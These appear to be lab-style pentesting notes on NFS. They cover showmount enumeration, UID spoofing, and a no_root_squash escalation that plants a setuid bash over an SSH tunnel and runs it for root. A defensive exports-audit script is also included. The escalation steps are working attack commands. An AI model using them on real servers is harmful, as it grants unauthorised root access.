
NFS (2049)

Enumeration

showmount $IP
showmount -e $IP

New user with new permissions

sudo groupadd -g 1014 <group name>
sudo groupadd -g 1014 1014
sudo useradd -u 1014 -g 1014 <user>
sudo useradd -u 1014 -g 1014 test
sudo passwd <user>
sudo passwd test

Changing permissions

The user being modified must not be logged in or active when this is run

sudo usermod -aG 1014 root

Changing owners

-rw------- 1 root root 3381 Sep 24  2020 id_rsa
sudo chown kali id_rsa
-rw------- 1 kali root 3381 Sep 24  2020 id_rsa

NFS Shares

Check upon initial access

cat /etc/exports

no_root_squash

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the “nobody” user.

Notice that the /srv/Share export for 127.0.0.1/32 has root squashing disabled (no_root_squash). Because of this, we can create a mount point on our local machine and mount the /srv share.

-bash-4.2$ cat /etc/exports
/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)

"no_root_squash"
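
Added example (not from the original notes): a small audit that parses an exports file like the one above and reports every path/client pair whose effective options include no_root_squash or insecure, plus a helper that lists setuid/setgid files inside an exported directory. The function names and the /data and /pub sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit exports(5) entries. Output: "<path> <client> <option>".
audit_exports() {
    awk '
    function report(path, client, opts,    n, o, i, squash, secure) {
        squash = 1; secure = 1      # exports(5) defaults: root_squash, secure
        n = split(opts, o, ",")
        for (i = 1; i <= n; i++) {  # later options override earlier ones
            if (o[i] == "no_root_squash") squash = 0
            else if (o[i] == "root_squash") squash = 1
            else if (o[i] == "insecure") secure = 0
            else if (o[i] == "secure") secure = 1
        }
        if (!squash) print path, client, "no_root_squash"
        if (!secure) print path, client, "insecure"
    }
    { sub(/#.*/, "") }                                   # strip comments
    /\\$/ { sub(/\\$/, ""); buf = buf $0 " "; next }     # join continuations
    { $0 = buf $0; buf = "" }
    NF >= 2 {
        defaults = ""
        for (f = 2; f <= NF; f++) {
            if ($f ~ /^-/) { defaults = substr($f, 2); continue }
            client = $f; opts = ""
            if (match($f, /\(.*\)$/)) {                  # client(opt,opt,...)
                client = substr($f, 1, RSTART - 1)
                opts = substr($f, RSTART + 1, RLENGTH - 2)
            }
            if (client == "") client = "*"               # bare "(opts)": any host
            report($1, client, defaults "," opts)
        }
    }' "${1:-/etc/exports}"
}

# Setuid/setgid files inside an exported directory deserve review.
setuid_files() { find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \); }

# Constructed sample: the first two entries are the ones shown above.
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)
/data -no_root_squash,ro 192.0.2.10 \
      192.0.2.11(root_squash)   # constructed: client option overrides default
/pub *(ro)
EOF
audit_exports "$sample"
```

Run audit_exports with no argument to check /etc/exports on the NFS server, and setuid_files /srv/Share to review the exported directory itself.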

Setup

sshuttle -r sea@10.11.1.251 10.1.1.0/24 #setup
ssh -L 6070:127.0.0.1:2049 userc@10.1.1.27 -N #tunnel for 127.0.0.1 /srv/Share
mkdir /mnt/tmp

Copy over a reliable version of bash from the victim

scp userc@10.1.1.27:/bin/bash . 
chown root:root bash; chmod +s bash #change ownership to root and set the setuid/setgid bits

Log in to the victim computer

ssh userc@10.1.1.27 

Exploit

cd /srv/Share

Check for the setuid bit

ls -la 

How to execute with the setuid bit set (-p stops bash from dropping the effective UID)

./bash -p 
whoami